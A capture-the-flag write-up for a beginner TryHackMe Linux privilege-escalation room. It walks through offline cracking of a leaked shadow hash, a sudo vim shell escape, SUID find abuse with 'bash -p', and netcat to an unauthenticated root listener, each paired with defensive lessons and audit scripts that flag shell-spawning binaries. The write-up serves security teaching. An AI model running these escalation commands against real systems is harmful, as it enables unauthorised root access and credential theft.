Riviru Eren
The Blackout Protocol - TryHackMe Room Writeup

The Blackout Protocol 🔒

"NovaCorp is hiding something. You've got one shot to get in, escalate, and expose them before they wipe everything at midnight."

This is a beginner-friendly Linux privilege escalation room I built on TryHackMe. It covers five techniques penetration testers use every day: SSH access and post-login enumeration, offline password cracking, sudo misconfiguration, SUID binary abuse, and a misconfigured service running as root.

If you're just getting started with Linux privesc, this room is perfect for you.

Room link: https://tryhackme.com/room/theblackoutprotocol


🧰 What You'll Need

  • 🐉 A Kali Linux machine (or any Linux attacking machine)
  • 🖥️ Basic familiarity with the Linux terminal
  • 🔨 John the Ripper (pre-installed on Kali)
  • 🔌 Netcat (pre-installed on Kali)
  • 🎯 A TryHackMe account with the room deployed

📖 The Story

You're playing the role of a whistleblower's contact. A low-level employee at NovaCorp, a shady tech company, has given you their SSH credentials. They've told you there's evidence of illegal data stored on an internal server, but they don't have root access to find it.

Your job: get in as intern, escalate your way to root, find the evidence, and get out.


🚩 Task 1 - Getting In

What's happening here?

This task covers the basics: SSH access and first-contact enumeration. When you land on a machine as a low-privilege user, look around before you do anything else: what is in your home directory (dotfiles included), which groups you belong to, and which other accounts exist on the system. Most of what follows in this room is found by exactly that kind of looking.

👣 Steps

  • Step 1 - Connect to the machine via SSH:
    ssh intern@MACHINE_IP
    password: novacorp1
  • Step 2 - Look around your home directory (-a includes dotfiles such as .bash_history, which are often the interesting part):
    ls -la
  • Step 3 - Read the first flag:
    cat flag1.txt
  • Step 4 - Check which other users have an interactive shell:
    grep '/bin/bash$' /etc/passwd

Only accounts whose shell is exactly /bin/bash show up here; a user with /bin/sh or /bin/zsh would be missed, so widen the filter if the result looks thin.

💡 You'll also notice a file called employees.bak - keep that in mind for the next task!

✅ Result

Flag 1: THM{w3lc0me_t0_n0v4c0rp}
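An added example, not part of the room or this writeup, that makes the Step 4 check a little more robust: instead of grepping for /bin/bash it filters out the known non-login shells, so accounts using /bin/sh or another shell still show up, and it also lists any account with UID 0 other than root. The function names are my own and the /etc/passwd content below is constructed for the demo.

```shell
#!/usr/bin/env sh
# Added example (not from the room): list accounts that can log in interactively.
# Filtering on "/bin/bash" alone misses users whose shell is /bin/sh, /bin/zsh etc.,
# so this filters out the known non-login shells instead.

# Constructed sample of /etc/passwd lines for offline testing (not the room's file).
SAMPLE_PASSWD='root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
intern:x:1000:1000:Intern:/home/intern:/bin/bash
sysadmin:x:1001:1001:Sysadmin:/home/sysadmin:/bin/sh
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
svc:x:999:999::/nonexistent:/bin/false'

# interactive_users FILE -> prints "user uid shell" for every account with a usable shell
interactive_users() {
    awk -F: '$7 !~ /(nologin|false|sync|halt|shutdown)$/ { print $1, $3, $7 }' "$1"
}

# uid0_users FILE -> every account with UID 0; anything besides root here is a backdoor
uid0_users() {
    awk -F: '$3 == 0 { print $1 }' "$1"
}

# Stand-alone demo on the sample; on a real box run: interactive_users /etc/passwd
tmp=$(mktemp)
printf '%s\n' "$SAMPLE_PASSWD" > "$tmp"
interactive_users "$tmp"
uid0_users "$tmp"
rm -f "$tmp"
```

On the sample this reports root, intern and sysadmin as interactive (sysadmin would have been missed by the plain /bin/bash grep) and root as the only UID 0 account.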


🚩 Task 2 - Who Are You?

What's happening here?

The employees.bak file holds a line in /etc/shadow format: a username and the salted hash of that user's password, followed by the password-ageing fields. Finding backups like this is extremely common on real engagements; sysadmins copy shadow or passwd files somewhere "temporary" without realising that the hash is all an attacker needs. Nothing has to be sent back to the target: we crack the hash offline with John the Ripper and a wordlist, and the only thing that crosses the wire afterwards is a normal SSH login.

👣 Steps

  • Step 1 - Look at the backup file:
    cat employees.bak

You'll see something like: sysadmin:$y$j9T$...:20585:0:99999:7:::

The $y$ prefix identifies a yescrypt hash, the default on current Debian and Ubuntu releases; the numbers after it are the password-ageing fields copied from /etc/shadow.

  • Step 2 - Copy it to your attacking machine:
    scp intern@MACHINE_IP:~/employees.bak .
  • Step 3 - Crack the hash with John the Ripper:
    john --wordlist=/usr/share/wordlists/rockyou.txt employees.bak

The line is already in user:hash form, so no unshadow step is needed and John picks the format itself. If it answers "No password hashes loaded", your John build does not know yescrypt natively; retry with --format=crypt so it hands the hash to the system's libcrypt. On a fresh Kali install rockyou.txt may still be gzipped under /usr/share/wordlists; decompress it first.

  • Step 4 - View the cracked password:
    john --show employees.bak
  • Step 5 - SSH in as sysadmin:
    ssh sysadmin@MACHINE_IP
    password: rockstar

⚠️ Lesson learned: Never leave password hash backups in world-readable locations. Ever. /etc/shadow is unreadable to normal users for a reason; a copy of its contents in a home directory undoes that protection completely.

✅ Result

Cracked password: rockstar
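An added example, not from the room: a small triage script for a leaked shadow-format file like employees.bak. It tells you which hashing scheme each line uses from its $-prefix (so you know what John or hashcat will need), which entries are worth cracking at all (locked or empty entries are not), and, for the defensive side of the lesson, finds backup-looking files that are readable by everyone. The function names and the sample lines are my own; the hash bodies in the sample are placeholders, not real hashes.

```shell
#!/usr/bin/env sh
# Added example (not from the room): triage a leaked shadow-format file before cracking.
# Identifies the hash scheme from its prefix so you pick the right john/hashcat mode,
# and flags backup files on the box that are readable by everyone.

# Constructed sample lines; the hash bodies are placeholders, not real hashes.
SAMPLE_BAK='sysadmin:$y$j9T$examplesalt$examplehashbody:20585:0:99999:7:::
legacy:$6$rounds=5000$salt$examplehashbody:19000:0:99999:7:::
oldbox:$1$salt$examplehashbody:15000:0:99999:7:::
locked:!:19000:0:99999:7:::
nopass::19000:0:99999:7:::'

# hash_scheme HASHFIELD -> yescrypt | scrypt | sha512crypt | sha256crypt | md5crypt | bcrypt | locked | empty | unknown
hash_scheme() {
    case "$1" in
        '$y$'*)        echo yescrypt ;;
        '$7$'*)        echo scrypt ;;
        '$6$'*)        echo sha512crypt ;;
        '$5$'*)        echo sha256crypt ;;
        '$1$'*)        echo md5crypt ;;
        '$2'[aby]'$'*) echo bcrypt ;;
        '!'*|'*'*)     echo locked ;;     # disabled account, nothing to crack
        '')            echo empty ;;      # no password set at all
        *)             echo unknown ;;
    esac
}

# triage FILE -> one line per account: "user scheme crackable(yes/no)"
triage() {
    while IFS=: read -r user hash _rest; do
        scheme=$(hash_scheme "$hash")
        case "$scheme" in
            locked|empty|unknown) crackable=no ;;
            *)                    crackable=yes ;;
        esac
        echo "$user $scheme $crackable"
    done < "$1"
}

# world_readable_backups DIR -> backup-looking files under DIR with the "other read" bit set
world_readable_backups() {
    find "$1" -type f \( -name '*.bak' -o -name '*shadow*' -o -name '*.old' \) -perm -004 2>/dev/null
}

# Stand-alone demo; on a real box run: triage employees.bak ; world_readable_backups /
tmp=$(mktemp -d)
printf '%s\n' "$SAMPLE_BAK" > "$tmp/employees.bak"
chmod 644 "$tmp/employees.bak"
triage "$tmp/employees.bak"
world_readable_backups "$tmp"
rm -rf "$tmp"
```

On the sample, sysadmin, legacy and oldbox come out as crackable (yescrypt, sha512crypt, md5crypt), the locked and empty entries do not, and the 0644 copy is reported as world-readable, which is the condition this task exploits.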


🚩 Task 3 - Sudo Slip-Up

What's happening here?

Sudo misconfiguration is one of the most common privilege escalation vectors in real environments. Administrators grant a user the right to run one specific program as root, forgetting that the program itself can run other programs: editors have shell escapes, interpreters execute arbitrary code, pagers call out to the shell. The rule here is also NOPASSWD, so it works from any session as intern, even one obtained without knowing intern's password. We check the sudo rights and use the vim entry from GTFOBins.

👣 Steps

  • Step 1 - Check sudo permissions as intern:
    sudo -l

You'll see: (ALL) NOPASSWD: /usr/bin/vim

  • Step 2 - Exploit vim to get a root shell:
    sudo vim -c ':!/bin/bash'

-c runs an Ex command as soon as vim starts, and :! hands that command to a shell. Because sudo started vim as root, the shell it spawns is root too. Use exactly the path that sudo -l lists; sudo matches the full path, not the command name.

  • Step 3 - Verify you're root:
    whoami
  • Step 4 - Read the flag:
    cat /var/log/novacorp/flag2.txt

⚠️ Lesson learned: Never grant NOPASSWD sudo on text editors, compilers, interpreters or pagers; they can all spawn shells. Before writing a sudo rule for any binary, check it on https://gtfobins.github.io; if it is listed under "Sudo", the rule is equivalent to handing out root.

✅ Result

Flag 2: THM{sud0_m1sc0nf1g_pwned}


🚩 Task 4 - Sticky Fingers

What's happening here?

SUID (set-user-ID) is a file permission bit. A program that has it runs with the effective user ID of the file's owner rather than that of the user who launched it; that is how passwd, owned by root, can update /etc/shadow on behalf of a normal user. It becomes a privilege escalation path when a root-owned SUID program lets its caller run arbitrary commands, which is exactly what find's -exec does. Custom or copied SUID binaries that an admin left behind are surprisingly common in real environments.

👣 Steps

  • Step 1 - Search the system for SUID binaries:
    find / -type f -perm -4000 2>/dev/null

-perm -4000 matches anything with the SUID bit set, -type f limits the search to regular files, and 2>/dev/null hides the permission-denied noise from directories you cannot read.

You'll spot /usr/bin/find_bak - a copy of find with SUID set.

  • Step 2 - Exploit it using GTFObins:
    /usr/bin/find_bak . -exec /bin/bash -p \; -quit

bash normally notices that its effective UID (root) differs from its real UID (intern) and drops back to the real one; -p (privileged mode) tells it to keep the effective UID. -quit stops find after the first match, so you get one shell instead of one per file in the directory.

  • Step 3 - Verify you're root:
    whoami

whoami reports the effective user, so it prints root; the real UID is still intern, which is why -p mattered.

  • Step 4 - Read the flag:
    cat /root/novacorp_secrets.txt

⚠️ Lesson learned: Audit your SUID binaries regularly and compare the list against what your distribution ships. A copy of a standard tool with the bit set is a red flag, and no custom binary should be SUID unless it absolutely has to be; if it only needs one privilege, a file capability is the smaller grant.

✅ Result

Flag 3: THM{su1d_b1n4ry_expl01ted}
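An added example that covers both this task and the sudo task before it, not part of the room: a quick audit script. risky_sudo_rules reads sudo -l output and flags NOPASSWD rules for programs that can spawn a shell, using a hand-picked subset of the GTFOBins catalogue; unexpected_suid lists SUID files under a directory whose names are not on a baseline you supply. The function names, the sample sudo -l output (including the hostname in it) and the throwaway SUID files are constructed for the demo.

```shell
#!/usr/bin/env sh
# Added example (not from the room): a small privesc audit covering both
# the sudo rule from Task 3 and the SUID binary from Task 4.
#  - risky_sudo_rules: parses "sudo -l" output and flags NOPASSWD rules for
#    programs known to spawn a shell (editors, interpreters, pagers, find...).
#  - unexpected_suid: lists SUID files under a directory that are not on
#    a baseline of names you expect to be SUID.
# The list below is a hand-picked subset of GTFOBins for the demo, not the full catalogue.

SHELL_SPAWNERS='vim vi nano less more man find awk python python3 perl ruby bash sh env'

# Constructed "sudo -l" output, modelled on what the room shows for intern (hostname is made up).
SAMPLE_SUDO_L='Matching Defaults entries for intern on novacorp:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User intern may run the following commands on novacorp:
    (ALL) NOPASSWD: /usr/bin/vim
    (root) /usr/sbin/service apache2 restart
    (ALL) NOPASSWD: /usr/bin/python3'

# risky_sudo_rules < sudo_l_output -> prints each NOPASSWD rule whose program can spawn a shell
risky_sudo_rules() {
    grep 'NOPASSWD:' | while read -r line; do
        prog=$(printf '%s\n' "$line" | sed 's/.*NOPASSWD: *//' | awk '{print $1}')
        name=$(basename "$prog")
        for s in $SHELL_SPAWNERS; do
            [ "$name" = "$s" ] && echo "RISKY: $line" && break
        done
    done
}

# unexpected_suid DIR BASELINE -> SUID files under DIR whose basename is not in BASELINE (space-separated)
unexpected_suid() {
    find "$1" -type f -perm -4000 2>/dev/null | while read -r f; do
        name=$(basename "$f")
        found=no
        for b in $2; do [ "$name" = "$b" ] && found=yes && break; done
        [ "$found" = no ] && echo "$f"
    done
}

# Demo: a throwaway directory with two SUID files, one expected (passwd) and one not (find_bak).
# On a real box: sudo -l | risky_sudo_rules ; unexpected_suid / "passwd sudo su mount umount ..."
d=$(mktemp -d)
for n in passwd find_bak; do : > "$d/$n"; chmod 4755 "$d/$n"; done
: > "$d/harmless"; chmod 755 "$d/harmless"
printf '%s\n' "$SAMPLE_SUDO_L" | risky_sudo_rules
unexpected_suid "$d" "passwd sudo su mount umount"
rm -rf "$d"
```

The sample flags the vim and python3 rules and ignores the service rule (it prompts for a password and service is not on the list); the SUID check reports only find_bak because passwd is on the baseline.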


🚩 Task 5 - The Backdoor

What's happening here?

Sometimes during a penetration test you find a service listening on an unusual port. Here NovaCorp's server has a misconfigured service running as root on port 4444, bound to all interfaces, and it hands a shell to anyone who connects: an open root shell with no authentication at all. Always check what is listening from inside the box, not just from the outside: ss shows everything, including services bound to 127.0.0.1 that a remote port scan can never see.

👣 Steps

  • Step 1 - Check what ports are open internally:
    ss -tlnp

You'll see a line like: LISTEN 0 ... 0.0.0.0:4444

0.0.0.0 means the socket accepts connections on every interface. The Process column stays empty for sockets owned by other users unless you run ss as root, so as intern you may not see which program is behind the port.

  • Step 2 - Connect from your attacking machine:
    nc MACHINE_IP 4444
  • Step 3 - You'll land in a root shell. It may show no prompt; just type the command and press Enter. Read the final flag:
    cat /root/final_evidence.txt

⚠️ Lesson learned: Never run services as root unless absolutely necessary, and firewall internal ports so that an extra listener is not reachable by default. A service running as root that executes whatever it is sent is a complete system compromise, with no exploit required.

✅ Result

Flag 4: THM{r00t_sh3ll_0wned_n0v4c0rp}
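An added example for the listening-port check, not from the room: it parses ss -tlnp output, reports listeners bound to all interfaces whose port is not on an expected list (port 4444 in this case), and separately lists loopback-only ports, the ones a remote scan never shows you. The function names are my own and the ss output below is constructed.

```shell
#!/usr/bin/env sh
# Added example (not from the room): parse "ss -tlnp" output and flag TCP listeners
# exposed on every interface (0.0.0.0 or [::]) whose port is not on an expected list.
# Loopback-only listeners are reported separately: a remote port scan never sees them,
# which is exactly why you enumerate from inside the box.

# Constructed sample output; process names appear only for sockets you own (or when run as root).
SAMPLE_SS='State   Recv-Q  Send-Q  Local Address:Port   Peer Address:Port  Process
LISTEN  0       128     0.0.0.0:22           0.0.0.0:*
LISTEN  0       128     [::]:22              [::]:*
LISTEN  0       4096    127.0.0.1:3306       0.0.0.0:*
LISTEN  0       1       0.0.0.0:4444         0.0.0.0:*
LISTEN  0       511     0.0.0.0:80           0.0.0.0:*          users:(("nginx",pid=612,fd=6))'

# listeners < ss_output -> "addr port" for every LISTEN line, IPv6 brackets stripped
listeners() {
    awk '$1 == "LISTEN" {
        n = split($4, parts, ":")                 # last ":"-separated piece is the port
        port = parts[n]
        addr = substr($4, 1, length($4) - length(port) - 1)
        gsub(/\[|\]/, "", addr)                   # "[::]" -> "::"
        print addr, port
    }'
}

# exposed_unexpected EXPECTED_PORTS < ss_output -> "addr:port" for listeners reachable
# from other hosts whose port is not in the space-separated EXPECTED_PORTS list
exposed_unexpected() {
    listeners | while read -r addr port; do
        case "$addr" in
            127.*|::1) continue ;;            # loopback: not reachable remotely
        esac
        ok=no
        for p in $1; do [ "$port" = "$p" ] && ok=yes && break; done
        [ "$ok" = no ] && echo "$addr:$port"
    done
}

# loopback_only < ss_output -> ports only reachable from the box itself
loopback_only() {
    listeners | awk '$1 ~ /^127\./ || $1 == "::1" { print $2 }' | sort -un
}

# Stand-alone demo on the sample; on a real box: ss -tlnp | exposed_unexpected "22 80"
printf '%s\n' "$SAMPLE_SS" | exposed_unexpected "22 80"
printf '%s\n' "$SAMPLE_SS" | loopback_only
```

With 22 and 80 expected, the sample yields 0.0.0.0:4444 as the unexpected exposed listener and 3306 as the only loopback-bound port; the two :22 lines (IPv4 and IPv6) are the same service and both pass the allowlist.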


📊 Summary

Task   | Technique             | Key command                               | Result
Task 1 | SSH enumeration       | ls -la                                    | THM{w3lc0me_t0_n0v4c0rp}
Task 2 | Password cracking     | john --wordlist=rockyou.txt employees.bak | password rockstar, SSH as sysadmin (no flag)
Task 3 | Sudo misconfiguration | sudo vim -c ':!/bin/bash'                 | THM{sud0_m1sc0nf1g_pwned}
Task 4 | SUID binary abuse     | find_bak . -exec /bin/bash -p \; -quit    | THM{su1d_b1n4ry_expl01ted}
Task 5 | Netcat backdoor       | nc MACHINE_IP 4444                        | THM{r00t_sh3ll_0wned_n0v4c0rp}

🧠 Key Takeaways

  • 🔍 Always enumerate thoroughly when you first land on a machine
  • 📁 Backup files left in readable locations can expose password hashes
  • ⚙️ Check sudo permissions with sudo -l; misconfigurations are incredibly common
  • 🏴 SUID binaries can be abused to escalate privileges; always check with find / -perm -4000
  • 🔌 Check open ports internally, not just externally, with ss -tlnp
  • 📖 GTFObins (https://gtfobins.github.io) is your best friend for privesc

Room created on TryHackMe; give it a try!
🔗 https://tryhackme.com/room/theblackoutprotocol
